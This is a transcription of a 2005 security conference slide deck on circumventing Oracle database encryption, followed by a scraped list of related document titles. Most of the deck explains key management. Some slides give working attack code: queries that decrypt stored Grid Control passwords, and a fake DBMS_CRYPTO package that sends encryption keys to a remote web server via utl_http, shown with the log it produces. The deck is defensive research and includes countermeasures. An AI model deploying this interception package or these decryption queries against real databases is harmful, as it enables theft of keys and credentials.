Circumvent Oracle s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms. Alexander Kornbrust 28-July-2005
|
|
|
- Joel Perkins
- 10 years ago
- Views:
Transcription
1 Circumvent Oracle s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms Alexander Kornbrust 28-July-2005 Alexander Kornbrust, 28-Jul-2005 V1.06 1
2 Agenda 1. Motivation 2. Key Management 3. PL/SQL-Wrapping 4. Oracle Enterprise Manager Grid Control 10g 5. Package Interception 6. Reverse Engineering Computed Keys 7. Design Hints 8. Q/A Alexander Kornbrust, 28-Jul-2005 V1.06 2
3 Motivation for using database encryption Documentation: Oracle 10g Release 1 / Release 2 "In well-publicized break-ins, a hacker obtained a large list of credit card numbers by breaking into a database. Had they been encrypted, the stolen information would have been useless. Encryption of stored data can thus be an important tool in limiting information loss even in the normally rare occurrence that access controls are bypassed." dvncrp.htm Alexander Kornbrust, 28-Jul-2005 V1.06 3
4 Motivation for using database encryption Tom Kyte Expert One-on-One: Oracle (page 1140) The primary reason people quote for an encrypting data in the database is to make it so the DBA, who can query any table, cannot make sense of the data in the table. [ ] You would like to assure that neither the DBA, who must be able to backup your database, nor the malicious hacker that breaks into your database, could read this highly sensitive information. If you stored it in clear text, it would be easy for someone to see it, if they gain DBA access to your database. If it is stored encrypted this would not be the case Alexander Kornbrust, 28-Jul-2005 V1.06 4
5 Motivation for using database encryption David C. Know Effective Oracle Database 10g Security by Design (page 450) Ultimately, the security of the encryption relies on how effectively the keys are managed. [ ] In many cases, the requirement for encrypting database data is to hide data from the DBAs. This will be difficult if not impossible for the very skilled and determined DBAs. However, it is possible to make the job extremely challenging. Alexander Kornbrust, 28-Jul-2005 V1.06 5
6 Motivation for using database encryption Oracle Director of Product Management Paul Needham in IDG News 25-July-2005 "Most of the customers would store the encryption key in a table in the database. To the extent that you have a DBA [account] that can see the tables, you can just read the tables and find the encryption key. The encryption software does provide a way of protecting sensitive data on storage media like backup tapes, and it can be used to bring users into compliance with government regulations, Needham said Alexander Kornbrust, 28-Jul-2005 V1.06 6
7 Motivation for using database encryption Hide data from the DBA Comply with regulations Last line of defense Encrypt data on external media (Backup) Alexander Kornbrust, 28-Jul-2005 V1.06 7
8 Sample I - Tables Customer CID Name CC 1 Fonnigan Nowman Lotchfield Corrudo Foyo Order OID CID Quantity Price Alexander Kornbrust, 28-Jul-2005 V1.06 8
9 Sample II Select unencrypted data C:\> sqlplus SQL> SELECT * FROM customer; 1 Fonnigan Nowman Lotchfield Corrudo Foyo Alexander Kornbrust, 28-Jul-2005 V1.06 9
10 Sample III Credit card numbers can be selected with a simple SELECT command (e.g. via SQL Injection) if a hacker with DBA privileges have access to the database Solution: Encrypt the data Alexander Kornbrust, 28-Jul-2005 V
11 Sample IV encrypted credit card numbers C:\> sqlplus SQL> SELECT * FROM customer; 1 Fonnigan 3$1^d&2349(/234 2 Nowman!^2üwed3y*ß= 21 3 Lotchfield!asd99%/ 0kj0LK 4 Corrudo ökß08anb897634k 5 Foyo +Wdsf54te95lm3$ Alexander Kornbrust, 28-Jul-2005 V
12 Database Encryption in Oracle Oracle 8i/9i provides the package dbms_obfuscation_toolkit (DES and 3DES) Oracle 10g provides the package dbms_crypto (DES, 3DES, AES, RC4 and 3DES_2KEY) 3rd party Software like DBEncrypt from AppSecInc or Encryption Wizard from Relational Database Consultants are using own libraries or are on top of the Oracle encryption packages Additional Option in Oracle 10g Release 2 : Transparent Data Encryption Alexander Kornbrust, 28-Jul-2005 V
13 Sample DBMS_OBFUSCATION_TOOLKIT (8i/9i) begin password := hextoraw('blackhat_usa2005'); dbms_obfuscation_toolkit.des3encrypt( input => plain_data_raw, key => password, encrypted_data => encrypted_data_raw, which => 1); end; / Alexander Kornbrust, 28-Jul-2005 V
14 Sample DBMS_CRYPTO (10g) declare -- set encryption algorithm l_algorithm PLS_INTEGER := dbms_crypto.encrypt_aes128 + dbms_crypto.chain_cbc + dbms_crypto.pad_pkcs5; l_key VARCHAR2(16) :='blackhat_usa2005'; -- set encryption key l_iv VARCHAR2(16) :=' '; -- set initialisation vector l_data varchar2(16):=' '; begin dbms_output.put_line('cc=' l_data 'Encrypted_Data=' utl_raw.cast_to_varchar2(dbms_crypto.encrypt( UTL_RAW.cast_to_raw(l_data), l_algorithm, UTL_RAW.cast_to_raw(l_key), UTL_RAW.cast_to_raw(l_iv)))); end; / Alexander Kornbrust, 28-Jul-2005 V
15 Challenge in symmetric encryption How to do a safe key management? Alexander Kornbrust, 28-Jul-2005 V
16 Challenge in symmetric encryption The Oracle customer is responsible for the the entire key management. Alexander Kornbrust, 28-Jul-2005 V
17 Key Management Strategies Fixed keys Key handled by the client Store key in the file system Store key in the database Computed keys Alexander Kornbrust, 28-Jul-2005 V
18 Key handled by the client User must enter the key or key is stored on the client PC/Application Server Advantages Key is not accessible by the DBA Disadvantages If the key is lost/forgotten (by the user), the data is lost Not in sync with backup/restore Key must be shared between users Alexander Kornbrust, 28-Jul-2005 V
19 Key handled by the client Alexander Kornbrust, 28-Jul-2005 V
20 Store key in the file system Key is stored in a different OS account and accessed by an external procedure Advantages Key is not accessible by the DBA Disadvantages Additional complexity (2nd listener, Library, ) Not in sync with backup/restore Alexander Kornbrust, 28-Jul-2005 V
21 Store key in the file system Alexander Kornbrust, 28-Jul-2005 V
22 Store key in the database Key is stored in the database (e.g. in a table or procedure) Advantages In sync with backup/restore Disadvantages Key is accessible by the DBA (like everything in the database) Alexander Kornbrust, 28-Jul-2005 V
23 Store key in the database Alexander Kornbrust, 28-Jul-2005 V
24 Computed keys For every row a different key is dynamically generated. Advantages No need to store keys in the database Every value has a different key Disadvantages Algorithm to generate the key must be protected Alexander Kornbrust, 28-Jul-2005 V
25 Computed keys Sample Algorithm Sample algorithm pk := read_primary_key; str := xor (pk, blackhat ); key:= md5(str); encrypt (value, key) Alexander Kornbrust, 28-Jul-2005 V
26 Wrapping PL/SQL-Code To stop the DBA (or the hacker) from reading the key or the key generating algorithm from the PL/SQL-code it is necessary to obfuscate the PL/SQL-source with the Oracle wrap utility Usage: wrap iname=mypack1.pkb Alexander Kornbrust, 28-Jul-2005 V
27 Wrapping PL/SQL-Code Excerpt from the Oracle Documentation: Documentation Oracle 9i: the Wrap Utility, a standalone programming utility that encrypts PL/SQL source code. You can use the Wrap Utility to deliver PL/SQL applications without exposing your source code. Documentation Oracle 10g: By hiding application internals, the wrap utility makes it difficult for other developers to misuse your application, or business competitors to see your algorithms. Oracle is aware that wrapping PL/SQL is not safe. Oracle changed the algorithm in Oracle 10g. It is possible to get the source of wrapped PL/SQL. Alexander Kornbrust, 28-Jul-2005 V
28 Wrapping Oracle 8i/9i Code I cat crypt_w.pkb CREATE FUNCTION myencrypt wrapped [ ] 1L_ALGORITHM: 1PLS_INTEGER: 1DBMS_CRYPTO: 1ENCRYPT_AES128: 1+: 1CHAIN_CBC: 1PAD_PKCS5: 1L_KEY: 116: 1blackhatusa_2005: 1L_IV: 1iv_bhusaa_2005_iv: 1L_DATA: : 1UTL_RAW: 1CAST_TO_VARCHAR2: [ ] Keep in mind that literals in 8i/9i are not obfuscated 1ENCRYPT: 1CAST_TO_RAW: b 2 0 a0 8d 8f a0 b0 3d b4 :2 a0 2c 6a a3 a0 51 a5 1c 81 b0 a3 a0 1c :2 a0 6b 7e :2 a0 6b b4 2e 7e :2 a0 6b b4 2e 81 b0 a3 a0 51 a5 1c 6e 81 b0 a3 a0 51 a5 1c 6e 81 b0 a3 a0 51 a5 1c 6e 81 b0 :3 a0 6b :2 a0 6b :2 a0 6b a0 a5 b :3 a0 6b a0 a5 b :2 a0 6b a0 a5 b a5 b a5 b d :2 a0 65 b7 a4 a0 b f 1d 17 b5 6b Alexander Kornbrust, 28-Jul-2005 V
29 Wrapping Oracle 8i/9i Code II cat crypt.sql [ ] -- blac khat _usa 2005 l1 varchar2(16):=chr(98) chr(108) chr(97) chr(9 9); l2 varchar2(16):=chr(107) chr(104) chr(97) chr(1 16); l3 varchar2(16):=chr(95) chr(117) chr(115) chr( 97); l4 varchar2(16):=chr(50) chr(48) chr(48) chr(53 ); l_key VARCHAR2(16) := l1 l2 l3 l4; [ ] cat crypt_w.pkb [ ] 1PAD_PKCS5: 1L1: 116: 1CHR: 198: 1 : 1108: 197: 199: 1L2: 1107: 1104: 1116: 1L3: 195: 1117: 1115: 1L4: 150: 148: 153: 1L_KEY: [ ] Alexander Kornbrust, 28-Jul-2005 V
30 Wrapping Oracle 10g Code cat crypt_w10.pkb CREATE OR REPLACE FUNCTION myencrypt wrapped a b2 abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd 8 1d2 171 XD2BtHNYhSd9zSYVOg2BSqYkVZYwg3n3NSDWfHQCv4vqzitRa+XKfy6E2kbIs00vaeB1V5Og nctvebqqteel9r5tbdnjnf6kngczw41awrejdejgt17u94tz8ltatn980/2mweewmvq8udqc 5FdfVAZChzU0hdWMuLrmTFQJqwHRsnoAhKenp2ACJwCh85zfXxzu+a7rLsPsosVI/CpyTRm9 /UnW/9yf6jqlN630Pfk7JG7Qc1sQvP6zybZkYAkNpdB6TBGq9cOuHYCw2anoZeqDAqbO+sF+ efti7mt2r2ltkyguo4wgmhw5adu3rj0rtt3tv8ngr8amdv++str26yq8pbtbdzgbn9hbvr+x Oj9s / In 10g Oracle changed the algorithm to make reverse engineering more difficult. In addition all literals are now obfuscated. Alexander Kornbrust, 28-Jul-2005 V
31 Real life example for database encryption The following example shows how Oracle itself uses database encryption to encrypt passwords for the Oracle Enterprise Manager Grid Control Alexander Kornbrust, 28-Jul-2005 V
32 Oracle Enterprise Manager (OEM) 10g Grid Control Oracle Enterprise Manager 10g Grid Control is Oracle s central tool for database administration and provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control (GC) is a web based application and stores encrypted database passwords, host passwords and credentials for Oracle Metalink. Alexander Kornbrust, 28-Jul-2005 V
33 Encryption in OEM 10g Grid Control Grid Control (GC) is a web based application and stores encrypted database passwords, host passwords and credentials for Oracle Metalink. If a hacker is able to decrypt the passwords he will have access to ALL database servers, TNS listener, hosts and Metalink-Accounts managed by the grid control. Alexander Kornbrust, 28-Jul-2005 V
34 Encryption in OEM 10g Grid Control Alexander Kornbrust, 28-Jul-2005 V
35 Encryption in OEM 10g Grid Control Demonstration Alexander Kornbrust, 28-Jul-2005 V
36 Encryption in OEM 10g Grid Control A short analysis of the grid control application shows Grid control uses the SYSMAN schema Passwords are stored in the tables MGMT_CREDENTIALS2, MGMT_ARU_CREDENTIALS and MGMT_VIEW_USER_CREDENTIALS Passwords are encrypted with the function encrypt Passwords are decrypted with the function decrypt DBA users can decrypt all passwords by using the decrypt function Alexander Kornbrust, 28-Jul-2005 V
37 Encryption in OEM 10g Grid Control Show the ARU (Metalink) -Username & Password select sysman.decrypt(aru_username), sysman.decrypt(aru_password) from SYSMAN.MGMT_ARU_CREDENTIALS; Show Oracle Password of the user mgmt_view select VIEW_USERNAME, sysman.decrypt(view_password) from SYSMAN.MGMT_VIEW_USER_CREDENTIALS; Show Username & Passwords for databases, operating system and listener login select credential_set_column, sysman.decrypt(credential_value) from SYSMAN.MGMT_CREDENTIALS2; Alexander Kornbrust, 28-Jul-2005 V
38 Encryption in OEM 10g Grid Control Design Flaws in Oracle Grid Control Encryption key (seed) is stored in clear text in the table MGMT_EMCRYPTO_SEED Every user with DBA permission or SELECT ANY TABLE can decrypt all passwords Sensitive data like passwords is located in the SYSMAN schema instead of SYS schema Obvious function and table names (seed, encrypt, decrypt, ) used PL/SQL-Code is wrapped with the weaker 9i version Dynamic SQL is not used to hide dependencies Alexander Kornbrust, 28-Jul-2005 V
39 Package Interception In the previous example I used design flaws and DBA permission to decrypt data The following approach works (in most cases) without DBA permission and a hacker is able to intercept all encryption keys With DBA permission a hacker or malicious DBA can ALWAYS intercept the encryption key The following sample is done with Oracle 10g but also possible with Oracle 8i/9i. Alexander Kornbrust, 28-Jul-2005 V
40 Package Interception How is Oracle resolving object names? Example: Name resolution: SQL> exec dbms_crypto.encrypt( ); Is there an object in the current schema (procedure, ) called dbms_crypto? If yes, use it. Is there a private synonym called dbms_crypto? If yes, use it. Is there a public synonym called dbms_crypto? If yes, use it. Alexander Kornbrust, 28-Jul-2005 V
41 Package Interception User 1 Tables Functions Procedures Packages Views encrypt/decrypt Private Synonyms encryption key dbms_crypto Public Synonyms encryption key encryption key SYS Views dbms_crypto dbms_crypto_ffi Tables Functions Procedures Packages encryption key Trusted library CRYPTO_TOOLKIT_LIBRARY Alexander Kornbrust, 28-Jul-2005 V
42 Package Interception User 1 encryption key dbms_crypto encryption key encrypt/decrypt Tables Functions Procedures Packages Views Private Synonyms encryption key Public Synonyms encryption key SYS Views dbms_crypto dbms_crypto_ffi Tables Functions Procedures Packages encryption key Trusted library CRYPTO_TOOLKIT_LIBRARY Alexander Kornbrust, 28-Jul-2005 V
43 Package Interception To intercept parameters from packages we need A package with the identical package specification as the original package Possibility to log parameter values or send to a foreign server (e.g. via utl_http, dns-requests, ) Alexander Kornbrust, 28-Jul-2005 V
44 Package Interception Use the default package specification from dbms_crypto from 10g and add the variable web server to send the encryption keys to this webserver CREATE OR REPLACE PACKAGE DBMS_CRYPTO AS -- Web Server for key logging KEYWEBSERVER CONSTANT VARCHAR2(40) :=' KEYRC VARCHAR2(32767); -- Hash Functions HASH_MD4 CONSTANT PLS_INTEGER := 1; HASH_MD5 CONSTANT PLS_INTEGER := 2; HASH_SH1 CONSTANT PLS_INTEGER := 3; [ ] -- MAC Functions HMAC_MD5 CONSTANT PLS_INTEGER := 1; HMAC_SH1 CONSTANT PLS_INTEGER := 2; Alexander Kornbrust, 28-Jul-2005 V
45 Package Interception Create a fake dbms_crypto CREATE OR REPLACE PACKAGE BODY DBMS_CRYPTO AS FUNCTION Encrypt (src IN RAW, typ IN PLS_INTEGER, key IN RAW, iv IN RAW DEFAULT NULL) RETURN RAW AS BEGIN keyrc:=utl_http.request(keywebserver 'user=' user '/' '/key=' UTL _RAW.cast_to_varchar2(key) '/iv=' UTL_RAW.cast_to_varchar2(iv) '/ty p=' typ); RETURN SYS.dbms_crypto.encrypt(src,typ,key,iv); END; [ ] Alexander Kornbrust, 28-Jul-2005 V
46 Package Interception Sample I Install the interception packages in the local schema appuser C:\> sqlplus appuser/appuser@orcl Package created. Package Body created. SQL> commit; Alexander Kornbrust, 28-Jul-2005 V
47 Package Interception Sample II We find the encryption key and initialization vector in the web server log file tail -f http-web-access.log [28/Jul/2005:10:36: ] "GET /user=appuser/key= /iv= /typ=4358 HTTP/1.1" [28/Jul/2005:10:38: ] "GET /user=appuser/key= /iv= /typ=4358 HTTP/1.1" [28/Jul/2005:10:40: ] "GET /user=appuser/key=blackhat_usa2005/iv= /typ=4358 HTTP/1.1" [28/Jul/2005:13:15: ] "GET /user=appuser/key= /iv= /typ=4358 HTTP/1.1" [28/Jul/2005:16:46: ] "GET /user=sys/key=<e6oyø?'??ns ~Þ<E6o" [28/Jul/2005:01:00: ] "GET /user=sysman/key=<e6oyø?'??ns ~Þ<E6o" [28/Jul/2005:01:00: ] "GET /user=sysman/key=<e6oyø?'??ns ~Þ<E6o" Alexander Kornbrust, 28-Jul-2005 V
48 Package Interception Every time the package dbms_crypto is executed The local (interception) package dbms_crypto is called The encryption key + initialization vector is sent to a web server The original dbms_crypto is called The return value from the original dbms_crypto is passed back to the local dbms_crypto The local dbms_crypto passes the return value back to the original caller Alexander Kornbrust, 28-Jul-2005 V
49 Package Interception The concept of package interception can intercept all keys independently from the key management strategy Keys handled by the client Keys stored in the file system Keys stored in the database because the key must be passed to the package dbms_crypto which can be intercepted. Alexander Kornbrust, 28-Jul-2005 V
50 Package Interception - Countermeasure Mitigate the risk by using full qualified names for packages e.g. exec SYS.dbms_crypto instead of exec dbms_crypto Now you need at least DBA permission to intercept keys Alexander Kornbrust, 28-Jul-2005 V
51 Package Interception Counter-countermeasure If the application uses full qualified names Or Move the original dbms_crypto from schema SYS to a different schema e.g. SYSTEM Create the fake dbms_crypto package in the SYS schema pointing to the relocated SYSTEM.dbms_crypto Replace the dbms_crypto or dbms_crypto_ffi with a trojanized version As long as parameters are passed it is possible to intercept them. Alexander Kornbrust, 28-Jul-2005 V
52 Package Interception User 1 Tables Functions Procedures Packages Views encrypt/decrypt Private Synonyms Public Synonyms SYS Views dbms_crypto dbms_crypto_ffi Tables Functions Procedures Packages Trusted library CRYPTO_TOOLKIT_LIBRARY Alexander Kornbrust, 28-Jul-2005 V
53 Reverse Engineering computed keys Computed keys use a different encryption key for every row It s possible to intercept these keys too but without the key generating algorithm we cannot decrypt other values Necessity to reverse engineer the computed key algorithm if unwrapping of PL/SQL is not an option Alexander Kornbrust, 28-Jul-2005 V
54 Reverse Engineering computed keys To compute the keys we must call PL/SQL functions/procedures to do the computation (like XOR, MD5, ) It is very easy to reverse engineer the key algorithm if an attacker knows the function, parameters and the call sequence it is very easy to reverse engineer the key algorithm Install interception packages for utl_raw, dbms_util, standard, dbms_crypto, Alexander Kornbrust, 28-Jul-2005 V
55 Reverse Engineering computed keys Sample output utl_raw.bit_xor, p1=4711, p2=2702 dbms_crypto.hash, p1=6377, p2=md5 dbms_crypto.encrypt, p1=secretdata, p2=aes128, p3=xxxx79ca696946aceb4337fb1ba9b23a, p4= And the appropriate key algorithm XOR the primary key 4711 with the value 2702 Generate MD5-checksum of the result Replace the first 4 characters of the MD5 checksum by XXXX The result is used to encrypt/decrypt the data Alexander Kornbrust, 28-Jul-2005 V
56 3rd party software All these concepts here are also valid for other 3rd party software. Some 3rd-party encryption software for Oracle databases which adds just an additional encryption layer to the application could always be intercepted. Alexander Kornbrust, 28-Jul-2005 V
57 Design hints Use unobvious function/procedure/table names instead of obvious ones (crypt/encrypt/creditcard/ ) Use dynamic SQL to hide Oracle dependencies Use full qualified names for (sensitive) function calls (e.g. SYS.dbms_crypto) Use a monolithic architecture (key generation and trusted libraries access in a single package) which requires no parameter passing. Ask Oracle if this solution is supported by Oracle Alexander Kornbrust, 28-Jul-2005 V
58 Encryption in Oracle 10g Release 2 - TDE In July Oracle released 10g Rel. 2 for Linux New encryption feature TDE (Transparent Data Encryption) as an additional option (Part of Advanced Security Option) Key Management is done by Oracle (database). Keys are stored in an external file (wallet). Alexander Kornbrust, 28-Jul-2005 V
59 Encryption in Oracle 10g Release 2 - TDE Already reported security problems in TDE Masterkey is stored unencrypted in the SGA (Memory of the database) Under special circumstances the password is written into a tracefile Excerpt from trace-file [ ] sql_id=8mg40j0m7kq07. Current SQL statement for this session: ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword" [ ] Alexander Kornbrust, 28-Jul-2005 V
60 Summary It is not possible to hide data from the DBA via dbms_crypto/dbms_obfuscation_toolkit Very often a hacker can get DBA privileges A hacker which is able to become a DBA (e.g. via dbms_metadata, ) he/she can read and/or decrypt everything (e.g. credit card numbers or grid control passwords) Database encryption with dbms_crypto or dbms_obfuscation_toolkit is not secure because a secure key management is not possible. Alexander Kornbrust, 28-Jul-2005 V
61 Demonstration Demonstration Alexander Kornbrust, 28-Jul-2005 V
62 Contact Alexander Kornbrust Bliesstrasse 16 D Neunkirchen Germany Telefon: +49 (0) Fax: +49 (0) Web: Alexander Kornbrust, 28-Jul-2005 V
Best Practices for Oracle Databases Hardening Oracle 10.2.0.3 / 10.2.0.4
Best Practices for Oracle Databases Hardening Oracle 10.2.0.3 / 10.2.0.4 Alexander Kornbrust Table of Content Passwords (Security) Patches Database Settings PUBLIC Privileges Database Trigger Compiling
Oracle post exploitation techniques. László Tóth [email protected]
Oracle post exploitation techniques László Tóth [email protected] Disclaimer The views expressed in this presentation are my own and not necessarily the views of my current, past or future employers. Content
Pentesting / Hacking Oracle databases with
IT Underground Prague 2007 Pentesting / Hacking Oracle databases with Alexander Kornbrust 9-March-2007 Table of content Introduction Find the TNS Listener TNS Listener enumeration Connecting to the database
All Things Oracle Database Encryption
All Things Oracle Database Encryption January 21, 2016 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation Agenda Database Encryption
Auditing Encryption in Oracle Databases
Auditing Encryption in Oracle Databases Prepared and presented by: Tanya Baccam SANS Institute Senior Certified Instructor CPA, CITP, CISSP, CISA, CISM, GSEC, GPPA, GCIH, OCP DBA Baccam Consulting LLC
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
Oracle Database Security. Nathan Aaron ICTN 4040 Spring 2006
Oracle Database Security Nathan Aaron ICTN 4040 Spring 2006 Introduction It is important to understand the concepts of a database before one can grasp database security. A generic database definition is
Oracle Database Vault: Design Failures
Oracle Database Vault: Design Failures What is Database Vault? Helps protecting against insider threats even when these comes from privileged database users (SYS) Mandatory in certain countries: laws Can
Database Extension 1.5 ez Publish Extension Manual
Database Extension 1.5 ez Publish Extension Manual 1999 2012 ez Systems AS Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License,Version
The Encryption Wizard for Oracle. User Manual
The Encryption Wizard for Oracle User Manual For Oracle 10g, 11g and 12c Databases Version 8 The Encryption Wizard for Oracle User Manual (RDC) 12021 Wilshire Blvd Suite 108 Los Angeles, CA. 90025 310-281-1915
1 Copyright 2012, Oracle and/or its affiliates. All rights reserved. Public Information
1 Copyright 2012, Oracle and/or its affiliates. All rights reserved. Public Information The following is intended to outline our general product direction. It is intended for information purposes only,
Fixing Common Problems in Data Storage - A Review
Security Design For Your Database Applications Least privilege, data and ownership 1 Legal Notice Security Design For Your Database Applications Published by PeteFinnigan.com Limited 9 Beech Grove Acomb
Oracle 1Z0-528 Exam Questions & Answers
Oracle 1Z0-528 Exam Questions & Answers Number: 1Z0-528 Passing Score: 660 Time Limit: 120 min File Version: 21.1 http://www.gratisexam.com/ Oracle 1Z0-528 Exam Questions & Answers Exam Name: Oracle Database
Get More for Less: Enhance Data Security and Cut Costs
Get More for Less: Enhance Data Security and Cut Costs Ulf Mattsson, CTO, Protegrity Corporation Dominic Dougherty, Protegrity Technical Support Agenda PCI DSS and State Legislation Different data protection
Oracle Database 11g: Security Release 2. Course Topics. Introduction to Database Security. Choosing Security Solutions
Oracle Database 11g: Security Release 2 In this course, students learn how they can use Oracle Database features to meet the security, privacy and compliance requirements of their organization. The current
Transparent Data Encryption: New Technologies and Best Practices for Database Encryption
Sponsored by Oracle : New Technologies and Best Practices for Database Encryption A SANS Whitepaper April 2010 Written by Tanya Baccam, SANS senior instructor and course author for SEC509: Oracle Database
Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó
Advanced SQL Injection in Oracle databases Esteban Martínez Fayó February 2005 Outline Introduction SQL Injection attacks How to exploit Exploit examples SQL Injection in functions defined with AUTHID
Centralized Oracle Database Authentication and Authorization in a Directory
Centralized Oracle Database Authentication and Authorization in a Directory Paul Sullivan [email protected] Principal Security Consultant Kevin Moulton [email protected] Senior Manager,
SQL Injection in web applications
SQL Injection in web applications February 2013 Slavik Markovich VP, CTO, Database Security McAfee About Me Co-Founder & CTO of Sentrigo (now McAfee Database Security) Specialties: Databases, security,
Defense In-Depth to Achieve Unbreakable Database Security
Defense In-Depth to Achieve Unbreakable Database Security Qiang Lin, Ph.D Abstract Enterprises realize that sole reliance on generic security mechanisms does not provide the protection they need for their
Database security tutorial. Part I
Database security tutorial Part I Oracle Tutorials, June 4 th 2012 Daniel Gómez Blanco Agenda Authentication Roles and privileges Auditing 2 Authentication Basis of any security model Process of confirming
Penetration Testing: Advanced Oracle Exploitation Page 1
Penetration Testing: Advanced Oracle Exploitation Page 1 Course Index:: Day 1 Oracle RDBMS and the Oracle Network Architecture... 3» Introduction and Oracle Review...3» Service Information Enumeration:...3»
Encrypting Data. Pete Finnigan, Principal Consultant. Insight Consulting
Encrypting Data Is it possible to prevent access? Pete Finnigan, Principal Consultant Introduction.My y name is Pete Finnigan.I specialise in researching, auditing and securing Oracle databases.i am going
Oracle EXAM - 1Z0-528. Oracle Database 11g Security Essentials. Buy Full Product. http://www.examskey.com/1z0-528.html
Oracle EXAM - 1Z0-528 Oracle Database 11g Security Essentials Buy Full Product http://www.examskey.com/1z0-528.html Examskey Oracle 1Z0-528 exam demo product is here for you to test the quality of the
Copyright 2012, Oracle and/or its affiliates. All rights reserved.
1 Oracle Database Security Advanced Security Option Thanos Terentes Printzios DB & Options Specialist A&C Technology Adoption Office Oracle Partner Business Development, ECEMEA 2 What is a customers INFORMATION
D50323GC20 Oracle Database 11g: Security Release 2
D50323GC20 Oracle Database 11g: Security Release 2 What you will learn In this course, you'll learn how to use Oracle Database features to meet the security, privacy and compliance requirements of their
Oracle Database 11g: Security
Oracle Database 11g: Security Student Guide D52365GC10 Edition 1.0 October 2007 PRODUCTION This documentation contains proprietary information of Oracle Corporation. It is provided under a license agreement
Application Design and Development
C H A P T E R9 Application Design and Development Practice Exercises 9.1 What is the main reason why servlets give better performance than programs that use the common gateway interface (CGI), even though
Oracle Database 11g Security Essentials
Oracle 1z0-528 Oracle Database 11g Security Essentials Version: 4.2 QUESTION NO: 1 Oracle 1z0-528 Exam Which of the following tasks is the first task to perform when implementing Oracle Database Vault?
Oracle 11g Database Administration
Oracle 11g Database Administration Part 1: Oracle 11g Administration Workshop I A. Exploring the Oracle Database Architecture 1. Oracle Database Architecture Overview 2. Interacting with an Oracle Database
DBMS Questions. 3.) For which two constraints are indexes created when the constraint is added?
DBMS Questions 1.) Which type of file is part of the Oracle database? A.) B.) C.) D.) Control file Password file Parameter files Archived log files 2.) Which statements are use to UNLOCK the user? A.)
HOW TO MAKE YOUR ORACLE APEX APPLICATION SECURE Peter Lorenzen, WM-data a LogicaCMG company
HOW TO MAKE YOUR ORACLE APEX APPLICATION SECURE Peter, WM-data a LogicaCMG company Security - What security? The lesson learned in the Internet era is that nothing is secure. There are security flaws in
ODTUG - SQL Injection Crash Course for Oracle Developers
ODTUG - SQL Injection Crash Course for Oracle Developers Alexander Kornbrust 11-Oct-2009 Agenda Introduction How (external) hackers work Tools SQL Injection Basics SQL Injection in mod_plsql SQL Injection
Protecting Data Assets and Reducing Risk
Protecting Data Assets and Reducing Risk Michelle Malcher Enterprise Database Security Oracle Open World 2014 2014 Wells Fargo Bank, N.A. All rights reserved. For public use. 1 Introduction Michelle Malcher
Migrate Topaz databases from One Server to Another
Title Migrate Topaz databases from One Server to Another Author: Olivier Lauret Date: November 2004 Modified: Category: Topaz/BAC Version: Topaz 4.5.2, BAC 5.0 and BAC 5.1 Migrate Topaz databases from
Cabot Consulting Oracle Solutions. The Benefits of this Approach. Infrastructure Requirements
Scheduling Workbooks through the Application Concurrent Manager By Rod West, Cabot Oracle Application users will be very familiar with the Applications concurrent manager and how to use it to schedule
How To Secure The Org Database
Oracle Database Security Checklist An Oracle White Paper June 2008 Oracle Database Security Checklist Protecting the database environment... 3 Install only what is required... 3 Lock and expire default
Data Scrambling in Non-PROD Cloned Instances
Data Scrambling in Non-PROD Cloned Instances John Peters JRPJR, Inc. [email protected] John Peters, JRPJR, Inc. 1 Before We Start A Quick Audience Survey How many of you have are on 11.0, 11i, 12?
Password Management. Password Management Guide HMS 9700
Password Management Password Management Guide HMS 9700 Hospitality Management Systems Purpose of document In certain cases Micros-Fidelio will return the responsibility of maintaining user passwords, including
Oracle Security Auditing
Introduction - Commercial Slide. RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 Founded February 2003 CEO Pete Finnigan Clients UK,
Oracle Security Auditing
RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 1 Introduction - Commercial Slide. Founded February 2003 CEO Pete Finnigan Clients
UnionSys Technologies Securing Stored Data Using Transparent Data Encryption And Disaster Recovery Solution
UnionSys Technologies Securing Stored Data Using Transparent Data Encryption And Disaster Recovery Solution UnionSys Technologies Transparent Data Encryption 1 CONTENTS Introduction... 3 Purpose... 3 Scope...
Hacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
Configuring and Monitoring Hitachi SAN Servers
Configuring and Monitoring Hitachi SAN Servers eg Enterprise v5.6 Restricted Rights Legend The information contained in this document is confidential and subject to change without notice. No part of this
Protecting GoldMine CRM database with DbDefence
Protecting GoldMine CRM database with DbDefence Version 1.1, 26 July 2013 Introduction As the backbone of any digital venture, databases are essential to the running of organizations, whether they be enormous
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Paul M. Wright Last updated Sunday 25 th February 2010. For www.oraclesecurity.com
Securing Java In Oracle Paul M. Wright Last updated Sunday 25 th February 2010 For www.oraclesecurity.com Introduction...1 The DBMS_JVM_EXP_PERMS vulnerability...1 How to test revocation of PUBLIC grant
Hacking and Protecting Oracle DB. Slavik Markovich CTO, Sentrigo
Hacking and Protecting Oracle DB Slavik Markovich CTO, Sentrigo What s This Presentation About? Explore SQL injection in depth Protect your code Finding vulnerable code Real world example What We'll Not
An Oracle White Paper June 2014. Security and the Oracle Database Cloud Service
An Oracle White Paper June 2014 Security and the Oracle Database Cloud Service 1 Table of Contents Overview... 3 Security architecture... 4 User areas... 4 Accounts... 4 Identity Domains... 4 Database
Securing Data on Microsoft SQL Server 2012
